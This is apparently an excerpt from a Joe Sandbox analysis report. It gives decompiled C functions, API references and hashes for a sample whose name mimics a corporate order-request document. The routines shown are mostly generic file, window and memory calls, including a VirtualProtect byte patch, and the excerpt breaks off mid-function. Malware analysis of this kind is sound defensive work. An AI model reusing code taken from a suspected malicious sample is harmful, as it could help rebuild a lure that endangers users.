                                                              				_t7 = ReadFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                              					return 0;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}





                                                              0x00405c8e
                                                              0x00405c9e
                                                              0x00405ca6
                                                              0x00000000
                                                              0x00405cad
                                                              0x00000000
                                                              0x00405caf

                                                              APIs
                                                              • ReadFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,00403232,00000000,00000000,00403079,000000FF,00000004,00000000,00000000,00000000), ref: 00405C9E
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FileRead
                                                              • String ID:
                                                              • API String ID: 2738559852-0
                                                              • Opcode ID: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                              • Instruction ID: 79895e6dacc008681341a1447f190e2469ffe8152373b8c922f561a90a2bf5e3
                                                              • Opcode Fuzzy Hash: adecdcd9fe1336769933b3dd03e703e4ef1681debcb31beef277c9a18cd5915e
                                                              • Instruction Fuzzy Hash: FCE08C3220921AABEF11AF908C00EEB3B6CFF04360F004832F910E7240D230E8218BA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00405CB9(void* _a4, void* _a8, long _a12) {
                                                              				int _t7;
                                                              				long _t11;
                                                              
                                                              				_t11 = _a12;
                                                              				_t7 = WriteFile(_a4, _a8, _t11,  &_a12, 0); // executed
                                                              				if(_t7 == 0 || _t11 != _a12) {
                                                              					return 0;
                                                              				} else {
                                                              					return 1;
                                                              				}
                                                              			}





                                                              0x00405cbd
                                                              0x00405ccd
                                                              0x00405cd5
                                                              0x00000000
                                                              0x00405cdc
                                                              0x00000000
                                                              0x00405cde

                                                              APIs
                                                              • WriteFile.KERNELBASE(00000000,00000000,00000004,00000004,00000000,000000FF,?,004031E8,00000000,0078B6F8,000000FF,0078B6F8,000000FF,000000FF,00000004,00000000), ref: 00405CCD
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FileWrite
                                                              • String ID:
                                                              • API String ID: 3934441357-0
                                                              • Opcode ID: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                              • Instruction ID: 3bcd5730ec7463d7366e74611f21d1d4cfbccb505e455464be6c792c77663440
                                                              • Opcode Fuzzy Hash: 6919b523ba5b1b84b4b924eeaf28b73d4aab7fc63dbc8f700f0d9cb823d33c03
                                                              • Instruction Fuzzy Hash: ABE0EC3225465AABEF109E559C00EEB7B6CFB057A0F044837F915E3150D631E921EBA4
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                              
                                                              				 *0x10004048 = _a4;
                                                              				if(_a8 == 1) {
                                                              					VirtualProtect(0x1000405c, 4, 0x40, 0x1000404c); // executed
                                                              					 *0x1000405c = 0xc2;
                                                              					 *0x1000404c = 0;
                                                              					 *0x10004054 = 0;
                                                              					 *0x10004068 = 0;
                                                              					 *0x10004058 = 0;
                                                              					 *0x10004050 = 0;
                                                              					 *0x10004060 = 0;
                                                              					 *0x1000405e = 0;
                                                              				}
                                                              				return 1;
                                                              			}



                                                              0x100027d0
                                                              0x100027d5
                                                              0x100027e5
                                                              0x100027ed
                                                              0x100027f4
                                                              0x100027f9
                                                              0x100027fe
                                                              0x10002803
                                                              0x10002808
                                                              0x1000280d
                                                              0x10002812
                                                              0x10002812
                                                              0x1000281a

                                                              APIs
                                                              • VirtualProtect.KERNELBASE(1000405C,00000004,00000040,1000404C), ref: 100027E5
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: ProtectVirtual
                                                              • String ID:
                                                              • API String ID: 544645111-0
                                                              • Opcode ID: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction ID: 0f6967942ea94a3d6c88e3f350f968197b77ea31d8e69eb9713f4ef8856af232
                                                              • Opcode Fuzzy Hash: 872da592a6d7a810a82f92163ecc1a118f8c9402d7722bf40bb7f7edf15a1654
                                                              • Instruction Fuzzy Hash: 47F0A5F15057A0DEF350DF688C847063BE4E3483C4B03852AE3A8F6269EB344454CF19
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040159B() {
                                                              				int _t5;
                                                              				void* _t11;
                                                              				int _t14;
                                                              
                                                              				_t5 = SetFileAttributesW(E00402BBF(0xfffffff0),  *(_t11 - 0x28)); // executed
                                                              				_t14 = _t5;
                                                              				if(_t14 == 0) {
                                                              					 *((intOrPtr*)(_t11 - 4)) = 1;
                                                              				}
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t11 - 4));
                                                              				return 0;
                                                              			}






                                                              0x004015a6
                                                              0x004015ac
                                                              0x004015ae
                                                              0x0040281e
                                                              0x0040281e
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • SetFileAttributesW.KERNELBASE(00000000,?,000000F0), ref: 004015A6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: AttributesFile
                                                              • String ID:
                                                              • API String ID: 3188754299-0
                                                              • Opcode ID: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
                                                              • Instruction ID: 919d528a87020fadcf7da11d7c25636ac447c6c10cfa6ed71665d8ccb2c3e407
                                                              • Opcode Fuzzy Hash: 627040d589bdeab8fa2eb58a529c745ef8675100561ec111daf7d71d3d3e8b9e
                                                              • Instruction Fuzzy Hash: 4DD05E73B04100DBCB50DFE8AE08A9D77B5AB80338B24C177E601F25E4DAB8C6509B1E
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404142(int _a4) {
                                                              				struct HWND__* _t2;
                                                              				long _t3;
                                                              
                                                              				_t2 =  *0x7a7a18; // 0x1043c
                                                              				if(_t2 != 0) {
                                                              					_t3 = SendMessageW(_t2, _a4, 0, 0); // executed
                                                              					return _t3;
                                                              				}
                                                              				return _t2;
                                                              			}





                                                              0x00404142
                                                              0x00404149
                                                              0x00404154
                                                              0x00000000
                                                              0x00404154
                                                              0x0040415a

                                                              APIs
                                                              • SendMessageW.USER32(0001043C,00000000,00000000,00000000), ref: 00404154
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
                                                              • Instruction ID: cc05bc227ed13b811f407cb85d7c2569ddbf91d4c39e4ff41bb473b50526893a
                                                              • Opcode Fuzzy Hash: 34b1e43e723837e4f12290cd16e63c230a0646a25d15ec9393d9ca5565e974df
                                                              • Instruction Fuzzy Hash: ABC09B71744700BBEA10DF649D49F1777547BA4751F14C8297351F51D0C674D450D71C
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E0040412B(int _a4) {
                                                              				long _t2;
                                                              
                                                              				_t2 = SendMessageW( *0x7a8a48, 0x28, _a4, 1); // executed
                                                              				return _t2;
                                                              			}




                                                              0x00404139
                                                              0x0040413f

                                                              APIs
                                                              • SendMessageW.USER32(00000028,?,00000001,00403F57), ref: 00404139
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: MessageSend
                                                              • String ID:
                                                              • API String ID: 3850602802-0
                                                              • Opcode ID: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
                                                              • Instruction ID: d373e4bc0d40e7382ef1e11b314aa0fa38d31fe2e2f9466a5520a1a67522e00c
                                                              • Opcode Fuzzy Hash: bf354d20d261541e0cf475626e5b376324ad062b219537505d1f6290c4af95c4
                                                              • Instruction Fuzzy Hash: AFB01235180A00BBDE514B00FE09F457E62F7AC701F00C429B340240F0CEB200B0DB09
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00403235(long _a4) {
                                                              				long _t2;
                                                              
                                                              				_t2 = SetFilePointer( *0x40a018, _a4, 0, 0); // executed
                                                              				return _t2;
                                                              			}




                                                              0x00403243
                                                              0x00403249

                                                              APIs
                                                              • SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402FB5,?,?,?,00000000,00403517,?), ref: 00403243
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: FilePointer
                                                              • String ID:
                                                              • API String ID: 973152223-0
                                                              • Opcode ID: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                              • Instruction ID: 2811e774c662cae59278f25d6ecae3b2a92cb5be3fe339fd2c15133e28e6e099
                                                              • Opcode Fuzzy Hash: 80da3fb7de925908d89dc6e0e66abe912019b1009effaac14551dbb45b1ebe3e
                                                              • Instruction Fuzzy Hash: D0B01231140300BFDA214F00DF09F057B21AB90700F10C034B344380F086711035EB4D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E00404118(int _a4) {
                                                              				int _t2;
                                                              
                                                              				_t2 = EnableWindow( *0x7a1f3c, _a4); // executed
                                                              				return _t2;
                                                              			}




                                                              0x00404122
                                                              0x00404128

                                                              APIs
                                                              • KiUserCallbackDispatcher.NTDLL(?,00403EF0), ref: 00404122
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: CallbackDispatcherUser
                                                              • String ID:
                                                              • API String ID: 2492992576-0
                                                              • Opcode ID: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
                                                              • Instruction ID: 444c84cbde4606a42b11029cb4d9c6b68aea771a74e0ff2f6fd8e0518f780766
                                                              • Opcode Fuzzy Hash: 0ec1fdd4797c0866aaad3ea28fe52db4664cae4b4a58853501ce3901ad29477a
                                                              • Instruction Fuzzy Hash: ACA0113A000000AFCF028B80EF08C0ABB22ABE0300B20C03AA280800308B320820FB08
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E004014D7() {
                                                              				long _t2;
                                                              				void* _t6;
                                                              				void* _t10;
                                                              
                                                              				_t2 = E00402BA2(_t6);
                                                              				if(_t2 <= 1) {
                                                              					_t2 = 1;
                                                              				}
                                                              				Sleep(_t2); // executed
                                                              				 *0x7a8ac8 =  *0x7a8ac8 +  *((intOrPtr*)(_t10 - 4));
                                                              				return 0;
                                                              			}






                                                              0x004014d8
                                                              0x004014e0
                                                              0x004014e4
                                                              0x004014e4
                                                              0x004014e6
                                                              0x00402a4f
                                                              0x00402a5b

                                                              APIs
                                                              • Sleep.KERNELBASE(00000000), ref: 004014E6
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63196910782.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                              • Associated: 00000001.00000002.63196877478.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63196974930.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197009044.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197453225.000000000077C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197496163.0000000000782000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197518608.0000000000786000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197543076.0000000000789000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197695292.00000000007A4000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197716192.00000000007A6000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197743150.00000000007AB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197768045.00000000007B3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197811147.00000000007CB000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197832810.00000000007D3000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                              • Associated: 00000001.00000002.63197862332.00000000007D8000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_400000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: Sleep
                                                              • String ID:
                                                              • API String ID: 3472027048-0
                                                              • Opcode ID: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
                                                              • Instruction ID: 9fddfdb3ce08ea3f3c8fe9d319431df7e4e0be4ecd303254129af624b9b4f796
                                                              • Opcode Fuzzy Hash: 3b931aa352be5dff596e25002f88090417078d46ab4e072b71b10e02e080c4ef
                                                              • Instruction Fuzzy Hash: CBD0C977B141009BD790EFB9AE8986A73A8EB913293248837D902E11A2D97CC811462D
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 100%
                                                              			E1000121B() {
                                                              				void* _t3;
                                                              
                                                              				_t3 = GlobalAlloc(0x40,  *0x1000406c +  *0x1000406c); // executed
                                                              				return _t3;
                                                              			}




                                                              0x10001225
                                                              0x1000122b

                                                              APIs
                                                              • GlobalAlloc.KERNELBASE(00000040,?,1000123B,?,100012DF,00000019,100011BE,-000000A0), ref: 10001225
                                                              Memory Dump Source
                                                              • Source File: 00000001.00000002.63200218360.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                              • Associated: 00000001.00000002.63200192081.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200243775.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              • Associated: 00000001.00000002.63200269821.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                              Joe Sandbox IDA Plugin
                                                              • Snapshot File: hcaresult_1_2_10000000_Order_request_0003352030_Arcelormittal_837478220293874639220654_docume.jbxd
                                                              Similarity
                                                              • API ID: AllocGlobal
                                                              • String ID:
                                                              • API String ID: 3761449716-0
                                                              • Opcode ID: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                              • Instruction ID: 8a0ecea123cfc10dc9c303f5c75fb6a011d4279a03f0c54a853e6fb6a4ccb70c
                                                              • Opcode Fuzzy Hash: 9c514497dbeefca74e47a404b0d43d99d31e609484f565d326becb97793310f2
                                                              • Instruction Fuzzy Hash: E3B012B0A00010DFFE00CB64CC8AF363358D740340F018000F701D0158C53088108638
                                                              Uniqueness

                                                              Uniqueness Score: -1.00%

                                                              C-Code - Quality: 96%
                                                              			E00404B0D(struct HWND__* _a4, int _a8, signed int _a12, int _a16) {
                                                              				struct HWND__* _v8;
                                                              				struct HWND__* _v12;
                                                              				signed int _v16;
                                                              				signed int _v20;
                                                              				intOrPtr _v24;
                                                              				signed char* _v28;
                                                              				long _v32;
                                                              				signed int _v40;
                                                              				int _v44;
                                                              				signed int* _v56;
                                                              				signed char* _v60;
                                                              				signed int _v64;
                                                              				long _v68;
                                                              				void* _v72;
                                                              				intOrPtr _v76;
                                                              				intOrPtr _v80;
                                                              				void* _v84;
                                                              				void* __ebx;
                                                              				void* __edi;
                                                              				void* __esi;
                                                              				signed int _t192;
                                                              				intOrPtr _t195;
                                                              				intOrPtr _t197;
                                                              				long _t201;
                                                              				signed int _t205;
                                                              				signed int _t216;
                                                              				void* _t219;
                                                              				void* _t220;
                                                              				int _t226;
                                                              				signed int _t231;
                                                              				signed int _t232;
                                                              				signed int _t233;
                                                              				signed int _t239;
                                                              				signed int _t241;
                                                              				signed char _t242;
                                                              				signed char _t248;
                                                              				void* _t252;
                                                              				void* _t254;
                                                              				signed char* _t270;
                                                              				signed char _t271;
                                                              				long _t276;
                                                              				int _t282;
                                                              				signed int _t283;
                                                              				long _t284;
                                                              				signed int _t287;
                                                              				signed int _t294;
                                                              				signed char* _t302;
                                                              				struct HWND__* _t306;
                                                              				int _t307;
